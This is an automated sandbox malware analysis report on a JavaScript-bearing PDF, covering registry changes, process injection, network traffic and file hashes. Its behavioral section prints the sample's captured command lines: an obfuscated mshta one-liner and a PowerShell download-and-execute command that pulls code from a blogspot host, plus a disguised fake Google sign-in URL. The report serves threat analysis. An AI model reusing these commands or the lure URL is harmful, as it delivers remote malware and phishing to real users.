Malware Analysis Report

2024-10-19 11:11

Sample ID 240207-sqnfysabb6
Target a2e7f3210ef4f7fb06606399dd09b873715abc2ce4a45900bd2434f37d55c559.zip
SHA256 c445c0bae9b5f72b7673419c5a0c8928350d00ab9d09fcd10f6caa6150b95e9c
Tags
pdf link javascript
score
6/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
6/10

SHA256

c445c0bae9b5f72b7673419c5a0c8928350d00ab9d09fcd10f6caa6150b95e9c

Threat Level: Shows suspicious behavior

The file a2e7f3210ef4f7fb06606399dd09b873715abc2ce4a45900bd2434f37d55c559.zip was found to be: Shows suspicious behavior.

Malicious Activity Summary

pdf link javascript

PDF contains JavaScript

Enumerates physical storage devices

One or more HTTP URLs in PDF identified

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Modifies Internet Explorer settings

Suspicious behavior: EnumeratesProcesses

Checks processor information in registry

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

Enumerates system info in registry

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-02-07 15:19

Signatures

PDF contains JavaScript

pdf javascript

One or more HTTP URLs in PDF identified

pdf link

Analysis: behavioral1

Detonation Overview

Submitted

2024-02-07 15:19

Reported

2024-02-07 15:22

Platform

win7-20231215-en

Max time kernel

117s

Max time network

142s

Command Line

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\a2e7f3210ef4f7fb06606399dd09b873715abc2ce4a45900bd2434f37d55c559.pdf"

Signatures

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{64E259A1-C5CC-11EE-88F9-76B33C18F4CF} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "413481084" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2220 wrote to memory of 2380 N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe C:\Windows\SysWOW64\mshta.exe
PID 2220 wrote to memory of 2380 N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe C:\Windows\SysWOW64\mshta.exe
PID 2220 wrote to memory of 2380 N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe C:\Windows\SysWOW64\mshta.exe
PID 2220 wrote to memory of 2380 N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe C:\Windows\SysWOW64\mshta.exe
PID 2220 wrote to memory of 2704 N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2220 wrote to memory of 2704 N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2220 wrote to memory of 2704 N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2220 wrote to memory of 2704 N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2380 wrote to memory of 2832 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 2832 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 2832 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 2832 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2704 wrote to memory of 2952 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2704 wrote to memory of 2952 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2704 wrote to memory of 2952 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2704 wrote to memory of 2952 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

Processes

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\a2e7f3210ef4f7fb06606399dd09b873715abc2ce4a45900bd2434f37d55c559.pdf"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" "javascript:_r°0=['Scripting.FileSystemObject','WScript.Shell','powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm htlfeb24.blogspot.com//////////////////////////////atom.xml | iex);Start-Sleep -Seconds 5;','run']; x°x=[_r°0[3],_r°0[0],_r°0[1],_r°0[2]]; new ActiveXObject(x°x[2])[x°x[0]](x°x[3], 0, true);close();new ActiveXObject(x°x[1]).DeleteFile(WScript.ScriptFullName);"

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://accounts.google.com+signin%3Dsecure+v2+identifier%[email protected]////////atom.xml?http://www.booking.com

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm htlfeb24.blogspot.com//////////////////////////////atom.xml | iex);Start-Sleep -Seconds 5;

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2704 CREDAT:275457 /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 api.bing.com udp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp

Files

memory/2832-2-0x000000006DE40000-0x000000006E3EB000-memory.dmp

memory/2832-3-0x000000006DE40000-0x000000006E3EB000-memory.dmp

memory/2832-4-0x0000000000250000-0x0000000000290000-memory.dmp

memory/2832-5-0x0000000000250000-0x0000000000290000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabE1CA.tmp

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

C:\Users\Admin\AppData\Local\Temp\TarE4CA.tmp

MD5 9c0c641c06238516f27941aa1166d427
SHA1 64cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA256 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

memory/2832-83-0x000000006DE40000-0x000000006E3EB000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 6f1b37e9aa88930e15b4aee3afc03f79
SHA1 be3636743e4773e342c40c2be24277b4604ce2bf
SHA256 af0d5f920aeed99be40e6d1aba6a7f7264a4a98c6f2b80d66e564453cb71185c
SHA512 4fa556f9b362947675e2dd51d59d821abbafaefbc1127fd71a3a24cea24b557ac077b00b14fc892b1303c95dc922de1edd4b48077cfc21e7f771bf744455831f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 252f5497cfeac5bbcbc4a10c17941e37
SHA1 083e43af5860bd07ab549f8bc4421cd113b82d71
SHA256 aa72b5e6d65a505be7330b3e4ac21858dc141551f374271574b4134f58c7b09a
SHA512 dcf5a00a30a23e36be639cfbd878ec0f5e53f6601ba780e7c31b68f5f3f222a1dd21d59b288a7844c4c71614cf2bb86bfd304f60e75042cd29476d9b38495aa4

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c27afeb0bbae829db72ac30e5ba8d55c
SHA1 21fc03619fb367c23afd19872a25309941184035
SHA256 f7df667bad612c7ef970208e686a86939da936df336b48722d68829ffba57596
SHA512 a8ae8f1ba1140052be6817f9378d21a44cc8590e7e7172bf0da7a2d2186d47fa5c863887acad98a7e745a4c54bf60428bf299b96fd143f1f0b514ad1e0d17083

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 1552a5ea0085d32ce9b633caff6ea458
SHA1 eea575081698284bb1b2967a513bfa6ce343f63b
SHA256 91ac8d23997476df5fcc982f8336e3a275ea92aaa75faa40a9732b8e8a24749c
SHA512 e1089712ca43a223e8fca7b0509c09271b2f276b24d565247dfec73f05645638002b83c03b637df63e820340cb7e92da988b8261cd66c632a3dd5838c0a03abe

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 ba583ef38f6baf36e9b695be5271da1e
SHA1 79539f9a46efcf3237ad1edbbdb823056910fca9
SHA256 04629e02177e94c6d94c4f81d65731259a5610cace5d89868e528f061172849b
SHA512 e4e7e77a90e34efdcebe082b12f88689fb6fd50a9365f7b873fd48924f3d73c84967f26ef15799356c7c11f112ad05ff161de805afc65bff2d18d3f1922ae61a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 32841ca4fa1bc43b9bfdea0e0a809734
SHA1 4fd0479154ecf315bbb3c4760e520336509578b0
SHA256 323eb37ef5f6141f77f8a68ea3d4aa41c51cff7650c1f16b9ce2323d852fc8a9
SHA512 c6b74f093612d10e02bf88823dd03551d8fcdb180abfebbcdd22f780fe95cd6d632dacdf9a7c5012f5dbc022c0bc4b49560bb9aaaa685bf99ba362b13a483515

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 6f41fa6bf50428e27e18a4b73859d553
SHA1 5213ce7c502d6c68e058ddb820987eaa0a4ac265
SHA256 4e56456bbd1fa9389bab026236e25db2e10c59e095cd49097ac5c6cdb3d5bbb9
SHA512 ae3875aa89d1a7cd8cb91fb7b1207b6b063e8b0f7316701c684503a34ccadf8f4feb19938f4cc00505e6b03909a920b3f2949c57ea174e867d572fef6ff83d88

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 6fa1e81b3de224840b5143ceeded9e90
SHA1 1c0afb63b62b8c7d3440770c90524411bc2b79e7
SHA256 03e3221be5e5b912823cb5e3cd94912f4dc710ce3fe538625b7e9eb4e494c863
SHA512 fe34c907c7596103221381880de550c624204421862abc0f53685295c10bfe017f80cc0c650f49eb83ff4b0377a94a8fdd12eec94628c0ce7fba2d7ab077233b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 8f71a8d423c2947fc044cf4b4ed43f98
SHA1 eab2aab527b44e7cf2034ebda17b6fd848e6ab6b
SHA256 30ad6f585136519107bc9cccdc9d323cb103c13060d2c3534f2e0464c11aa4f5
SHA512 a74cec782b47373c42c6470b3e7b57914f66fd34e7b42b6d8d4d6dae888c7e2946a094368e51cd73e2a684e1d68c2834480604e4f8a54cfe3476c607560877b0

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 19039e901207bdae8e1376cfe09f645d
SHA1 3b7d6496d545018b5582c6d9254cd2f2cbb69d50
SHA256 b86036abc1cc1050b9f00e714af1f3815fdc4d4c135e084be17755ed6544d1f9
SHA512 dc0d2303de593de3e0e8c232279f9aa475c7d39a6bac1fcc698e9dd92a768ff17d63d19fdadb3d1df6ad68f7bde48078dbb576344dcdc125a9fa8823317de872

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 b501d6c97d61eab195fe4b7f1dcc09f8
SHA1 c4399036054545b1383e57558579fc219eb637a3
SHA256 7f2aa8af38f5d3b02599cec5abee04e75934013e97ba933093102377a94c216b
SHA512 efa02893195637ea85581a658f21d9211bf29f737901c7cdfddf3a26f77b6b6341f6bca75184ebed3e2daad2273f94e78e412879f28d3715dccf385e1bb7da28

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 5c9b1499a0a2f81923e70d1ff1b8e50c
SHA1 d2073a348bced4cf5b0a05c88ea56a57745ddabb
SHA256 0f5199d2a81ab952c75b1bb118cf60eeea68af00e21cc5bd89aa9ee0ad4088a4
SHA512 996a2efae7572ce5952b3ad8d0bf6a4af21843efaa6c92a1e74dba9aeaf0bbd8e15be3c32b6fcff86de7fe7257bfcc642e9ab0106fd3db75fb2ae1f79f520a02

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 0724b11ea4746fc28a6364d09304c3fb
SHA1 117eea326a6a37ae10064591e804e629b6be8fc5
SHA256 6d10b002d09babd7bdc3281fe31367fe9f89a92078d54e3afa1105c57d332029
SHA512 2424fcf978afcfa1eab5f57a858bdd432b9492d1a76311d6080249f90b409cbcbceed0b0dc49ab0dbb6bcc1ec43b10453f9df0904451184b73155c1fd53fd7c8

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 e7a3f93d49007c771a34eaccac1c9a63
SHA1 82d4dd111e89a90a38ed0d4afef2968b5c3a07f6
SHA256 b873d365ab2528156e4f8232a46b9adde78d108951276b868445176f5747def1
SHA512 f3d469f829caed995832de71b76b8a398ab369f98a4351cf1058c65b9696308ce9112f6c377913f52533dff3c7659ef808fb4c252056b9239d060fe1e7f90271

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 fc0b98705430d61eb6d26c306eeadcb9
SHA1 c2102f9d1606733a198b2718ae31890d1dbf6977
SHA256 dbc35cfbe4f6b68ea8544a363a86c4e22f0aad37d6f281df572378bb28ec65b6
SHA512 6ebc4fd3564236326ae2b28e2df414e178e232751022e9d4a84afd51c5a69fc53ea97bbdfc59c8ec1105884b6a6987a0ea3bd814e06dd6bc6162be601726a9b2

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 cc43d3ba9e35a0839c116f013b4b726e
SHA1 e0ad3f113f18c426cb9662b5b0a6c60e186a69d7
SHA256 c63609a38c78b4d1e94f462f9b1ca72d0b704655dc2850280d098eac1505c5a7
SHA512 8c9d2e0349cb64e59b19400e55b547fb1feb12f327b2a4b01395f916080b2d912e41d88357c03ec0baf6f4337d0c22d8784e044483be2be2cc46368cbefb27c8

Analysis: behavioral2

Detonation Overview

Submitted

2024-02-07 15:19

Reported

2024-02-07 15:22

Platform

win10v2004-20231215-en

Max time kernel

146s

Max time network

154s

Command Line

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\a2e7f3210ef4f7fb06606399dd09b873715abc2ce4a45900bd2434f37d55c559.pdf"

Signatures

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 980 wrote to memory of 932 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 980 wrote to memory of 932 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 3356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 3356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 5116 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 5116 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 5116 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 5116 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 5116 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 5116 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 5116 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 5116 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 5116 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
